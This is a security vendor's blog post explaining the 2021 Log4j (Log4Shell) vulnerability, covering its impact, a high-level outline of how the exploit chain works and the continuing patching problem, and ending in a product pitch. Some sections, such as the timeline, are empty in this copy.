How the Log4j Attack Created a Worldwide Logjam—and What Happens Now

Get an overview of the Log4j vulnerability and learn what you should do next.

At the end of 2021 a vulnerability was discovered on Log4j—a Java-based software that large organizations, including some of the world’s biggest tech firms, use to log information in their applications—that wreaked havoc on the internet on a global scale. Hackers were actively attempting to exploit the vulnerability by the minute.

“This vulnerability is one of the most serious that I’ve seen in my entire career, if not the most serious,” Jen Easterly, director of the US Cybersecurity and Infrastructure Security Agency (CISA), said on a phone call shared with CNN at the time.

In this blog, we’ll break down howit started, what the impact was, and what happens (or should happen) next.

The Inception: What is Log4j? Log4j is a Java logging library that logs messages of activities on a software or device. The powerful library can create simple logs and execute commands to create advanced logging and integrate with other components.

Log4j is widely used across consumer and enterprise systems, in everything from iCloud, Steam and Minecraft, to Fortinet, IBM, Microsoft, Red Hat, Salesforce, Siemens, and other major enterprises.

What is the Log4j vulnerability? Known as Log4Shell, it is a remote code execution (RCE) vulnerability that, if left unmitigated, enables a malicious threat actor to execute arbitrary Java code to take control of a target server. The troubling part is that it is easy to exploit and doesn’t require authentication. 

And it gets worse. 

The vulnerability can allow malicious actors to execute software or insert backdoors on systems to maintain persistent ongoing access.

Timeline of Events:

The Impact:

Log4j is a very ubiquitous Java logging library—it can be found in nearly everything written in Java or depends/relies on Java software. Some examples of major recognizable platforms impacted are Apple, Amazon, Google, Cloudflare, Twitter, and Minecraft.

Exploitation is simple and does not require authentication. For example, a bad actor

How Does It Work Exactly?

  1. A bad actor injects a malicious payload via a user-supplied input. A bad actor can use HTTP header or other fields that are logged by Log4j. 
  1. The application receives the request and logs the input.
  1. The Log4j library processes the log entry, interprets the lookup expression, and connects to a malicious LDAP server that the bad actor controls.
  1. The malicious LDAP server responds and instructs the application to download a malicious class file.
  1. The application downloads and executes the malicious Java class file.

The Aftermath:

We may not be hearing as much about it in the news, but organizations are still struggling to identify and patch affected systems because of how pervasive the Log4j library is. Many organizations are still unpatched because of the complexity of updating software across multiple interdependent systems at once. Other organizations are relying on the fact that their affected systems are not directly exposed to the Internet to delay patching. However, those systems can still be targeted via other means and once compromised, create as big a threat as public systems.

It is estimated to impact hundreds of organizations and thousands of systems. That number continues to rise as researchers—and criminals—continue to scan the Internet for affected systems.

How Can Trava Help?

Trava’s comprehensive risk assessment platform can help in several areas:

Download Trava's Complete Guide to Vulnerability Scan types that details

Then schedule a demo to see Trava's vulnerability risk assessment tool in action.

Schedule a Demo